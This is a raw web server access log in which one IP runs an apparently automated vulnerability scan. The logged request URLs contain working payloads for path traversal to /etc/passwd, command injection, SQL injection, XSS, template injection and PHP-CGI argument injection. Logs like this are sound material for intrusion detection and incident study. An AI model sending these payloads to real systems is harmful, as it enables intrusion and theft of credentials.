195.164.49.69 - - [20/Oct/2024:17:27:59 +0000] GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:17:28:00 +0000] GET /sslmgr HTTP/1.1 404 1080
- - - [20/Oct/2024:17:28:01 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:17:28:02 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:17:28:03 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:17:28:04 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/g8oC.css HTTP/1.1 404 1178
195.164.49.69 - - [20/Oct/2024:17:28:05 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/ucDr.css HTTP/1.1 404 1191
195.164.49.69 - - [20/Oct/2024:17:28:06 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:17:28:07 +0000] GET /www/setup.php HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:17:28:08 +0000] GET /dompdf/dompdf/www/setup.php HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:17:28:09 +0000] GET /js/dompdf/www/setup.php HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:17:28:10 +0000] GET /portal/application/libraries/dompdf/www/setup.php HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:17:28:11 +0000] GET /sites/all/libraries/dompdf/www/setup.php HTTP/1.1 404 1134
195.164.49.69 - - [20/Oct/2024:17:28:11 +0000] GET /vendor/dompdf/dompdf/www/setup.php HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:17:28:13 +0000] GET /api/experimental/latest_runs HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:17:28:14 +0000] GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1 404 1187
- - - [20/Oct/2024:17:28:15 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:17:28:17 +0000] GET /NON_EXISTING_PATH/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:17:28:18 +0000] GET /.bash_history HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:28:19 +0000] GET /.ksh_history HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:17:28:20 +0000] GET /.sh_history HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:17:28:21 +0000] GET /.zsh_history HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:17:28:22 +0000] GET /trace HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:17:28:23 +0000] GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1 404 1122
- - - [20/Oct/2024:17:28:24 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:17:28:25 +0000] GET /public/error.jsp?errCode=%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:28:26 +0000] GET /xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1 404 1123
195.164.49.69 - - [20/Oct/2024:17:28:27 +0000] GET /bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dprintln%28%22Hello%20from%22%20%2B%20%22%20search%20text%3A%22%20%2B%20%2823%20%2B%2019%29%29%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D%20 HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:17:28:28 +0000] GET /remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:17:28:30 +0000] GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:17:28:31 +0000] GET /dump HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:17:28:32 +0000] GET /actuator/dump HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:17:28:33 +0000] GET /mifs/asfV3/api/v2/admins/users HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:17:28:34 +0000] GET /.DS_Store HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:17:28:35 +0000] GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:17:28:36 +0000] GET /wp-content/plugins/give/readme.txt HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:17:28:37 +0000] GET /access/set?param=enableapi&value=1 HTTP/1.1 404 1088
127.0.0.1 - - [20/Oct/2024:17:28:38 +0000] GET /server-status HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:28:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:28:40 +0000] GET /cgi-bin/status HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:17:28:41 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:17:28:42 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:17:28:42 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:28:43 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:17:28:44 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:17:28:45 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:28:47 +0000] GET /cgi-bin/weblogin.cgi?username=admin';cat+/etc/passwd HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:17:28:48 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../etc/passwd&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:28:48 +0000] GET /ACSServer/DownloadFileServlet?show_file_name=../../../../../../windows/win.ini&type=uploadfile&path=anything HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:28:51 +0000] POST /_search?pretty HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:17:29:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:29:34 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:29:39 +0000] PUT /fileserver/2niA4IZkkhjThJrTc6HlcALQF1i.txt HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:17:29:41 +0000] GET /fileserver/2niA4IZkkhjThJrTc6HlcALQF1i.txt HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:17:29:43 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:29:45 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:17:29:47 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:17:29:49 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:30:11 +0000] PUT /2niA4HM43uOWKrNPcNqmfe0HPXA.jsp/ HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:17:30:12 +0000] GET /2niA4HM43uOWKrNPcNqmfe0HPXA.jsp HTTP/1.1 404 1105
- - - [20/Oct/2024:17:30:32 +0000] GET null HTTP/1.1 400 2308
83.212.98.101 - - [20/Oct/2024:17:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:17:30:56 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:31:22 +0000] POST /integration/saveGangster.action HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:17:31:45 +0000] GET /__ HTTP/1.1 404 1076
195.164.49.69 - - [20/Oct/2024:17:32:08 +0000] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1148
195.164.49.69 - - [20/Oct/2024:17:32:09 +0000] GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [20/Oct/2024:17:32:11 +0000] GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1160
195.164.49.69 - - [20/Oct/2024:17:32:13 +0000] GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:17:32:15 +0000] GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [20/Oct/2024:17:32:17 +0000] GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1157
83.212.98.101 - - [20/Oct/2024:17:32:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:34:16 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:17:34:16 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:17:34:37 +0000] POST /soap.cgi?service=whatever-control;curl HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:17:34:58 +0000] POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:17:35:23 +0000] POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1 404 1149
83.212.98.101 - - [20/Oct/2024:17:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:17:35:46 +0000] POST /password_change.cgi HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:17:36:08 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:17:36:29 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:36:31 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:36:33 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:37:14 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:17:37:18 +0000] GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:17:37:20 +0000] GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 404 1104
83.212.98.101 - - [20/Oct/2024:17:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:37:40 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:17:37:42 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:17:38:31 +0000] POST /rest/tinymce/1/macro/preview HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:17:38:53 +0000] POST /node/1?_format=hal_json HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:17:39:14 +0000] POST /service/extdirect HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:17:39:38 +0000] POST /cgi-bin/supportInstaller HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:40:00 +0000] POST /api/timelion/run HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:17:40:02 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:40:24 +0000] POST /service/rapture/session HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:40:25 +0000] POST /service/rest/beta/repositories/bower/group HTTP/1.1 404 1136
83.212.98.101 - - [20/Oct/2024:17:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:17:40:49 +0000] POST /mifs/.;/services/LogService HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:17:41:14 +0000] GET /fuel/login/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:17:41:15 +0000] GET /fuel/pages/items/?search_term&published&layout&limit=50&view_type=list&offset=0&order=asc&col=location+AND+(SELECT+1340+FROM+(SELECT(SLEEP(6)))ULQV)&fuel_inline=0 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:17:41:15 +0000] POST /fuel/login/ HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:17:41:21 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:17:41:46 +0000] GET /check_browser?lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:17:42:08 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:17:42:10 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:17:42:11 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1 404 1152
195.164.49.69 - - [20/Oct/2024:17:42:13 +0000] GET /hsqldb%0a HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:17:42:15 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:17:42:17 +0000] POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:17:42:19 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:17:42:21 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
83.212.98.101 - - [20/Oct/2024:17:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:43:32 +0000] POST /EemAdminService/EemAdmin HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:43:35 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:17:43:35 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:17:43:57 +0000] POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:17:43:59 +0000] GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:17:44:01 +0000] GET /menu/neo HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:17:44:03 +0000] GET /menu/stc HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:17:44:19 +0000] POST /cgi-bin/mainfunction.cgi HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:44:45 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:17:44:49 +0000] POST /casa/nodes/thumbprints HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:17:44:51 +0000] POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 404 1218
195.164.49.69 - - [20/Oct/2024:17:44:55 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:17:45:35 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:45:35 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:17:45:35 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:17:45:35 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:17:45:36 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [20/Oct/2024:17:45:36 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:17:45:36 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:17:45:36 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:17:45:36 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:17:45:36 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [20/Oct/2024:17:45:36 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:17:45:37 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:17:45:37 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
83.212.98.101 - - [20/Oct/2024:17:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:17:45:55 +0000] POST /wsman HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:17:46:18 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:17:46:20 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:17:46:22 +0000] POST /./RestAPI/Connection HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:17:46:24 +0000] GET /help/admin-guide/test.jsp HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:47:22 +0000] POST /v1/backend1 HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:17:47:24 +0000] GET /v1/2niA4GEDrELSgds2iDZO6o2qGdQ.php HTTP/1.1 404 1112
83.212.98.101 - - [20/Oct/2024:17:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:47:46 +0000] GET /client/index.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:47:51 +0000] GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:17:47:53 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:17:47:57 +0000] POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:47:59 +0000] GET /OA_CGI/FNDWRR.exe HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:17:48:00 +0000] POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:48:53 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:17:48:55 +0000] POST /api/content/ HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:48:57 +0000] GET /2niA4JLZrbcUzzvJew3GfArOyQN.jsp HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:48:59 +0000] POST /fileupload/toolsAny HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:17:49:01 +0000] GET /authenticationendpoint/2nia4ojxiar44sbwpf0wqbzu3xj.jsp HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:17:49:10 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:17:49:12 +0000] GET /login.zul HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:17:49:16 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:17:49:18 +0000] POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:17:49:18 +0000] POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1 404 1121
195.164.49.69 - - [20/Oct/2024:17:49:18 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:17:49:23 +0000] GET /api/v2/cmdb/system/admin HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:17:49:24 +0000] PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:17:49:29 +0000] POST /aspera/faspex/package_relay/relay_package HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:17:49:31 +0000] POST /goanywhere/lic/accept HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:17:49:33 +0000] POST /index.php?c=blocked&action=continue HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:17:49:36 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:17:49:38 +0000] GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2niA4JRgavES1NvKguJeQ4XAcrf HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:17:49:40 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:17:49:41 +0000] POST /setup/setupadministrator.action HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:17:49:43 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:17:49:45 +0000] GET /welcome.action HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:17:49:49 +0000] POST /api/2.0/mlflow/registered-models/create HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:17:49:51 +0000] POST /api/2.0/mlflow/model-versions/create HTTP/1.1 404 1126
83.212.98.101 - - [20/Oct/2024:17:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:17:52:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
83.212.98.101 - - [20/Oct/2024:17:55:46 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
83.212.98.101 - - [20/Oct/2024:17:57:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:17:57:50 +0000] GET /app?service=page/SetupCompleted HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:57:52 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:57:53 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:57:55 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:57:57 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:57:59 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:58:01 +0000] GET /app?service=page/PrinterList HTTP/1.1 404 1077
195.164.49.69 - - [20/Oct/2024:17:58:19 +0000] DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:17:58:20 +0000] POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:17:58:23 +0000] GET /WebInterface HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:17:58:26 +0000] GET /api/server/version HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:17:58:42 +0000] POST /webtools/control/xmlrpc?USERNAME&PASSWORD=2niA4HQu99L24OZOM0Cz58thN8l&requirePasswordChange=Y HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:17:58:43 +0000] GET /api/clusters HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:17:58:49 +0000] GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:17:58:50 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:17:58:53 +0000] GET /xyz/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:17:59:00 +0000] POST /dana-na/auth/saml-sso.cgi HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:17:59:04 +0000] POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 404 1133
195.164.49.69 - - [20/Oct/2024:17:59:06 +0000] GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:17:59:08 +0000] GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 200 11204
- - - [20/Oct/2024:17:59:10 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:17:59:14 +0000] GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:17:59:20 +0000] GET /en-US/login HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:17:59:23 +0000] POST /Startup/Register HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:17:59:25 +0000] POST /Token HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:17:59:37 +0000] POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:17:59:39 +0000] POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:17:59:41 +0000] POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:17:59:42 +0000] POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:17:59:46 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
